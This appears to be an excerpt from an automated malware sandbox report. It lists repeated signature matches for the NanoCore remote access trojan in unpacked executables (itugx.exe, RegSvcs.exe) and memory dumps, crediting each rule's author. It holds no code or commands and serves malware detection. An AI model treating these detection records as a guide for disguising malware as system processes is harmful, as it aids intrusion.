Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
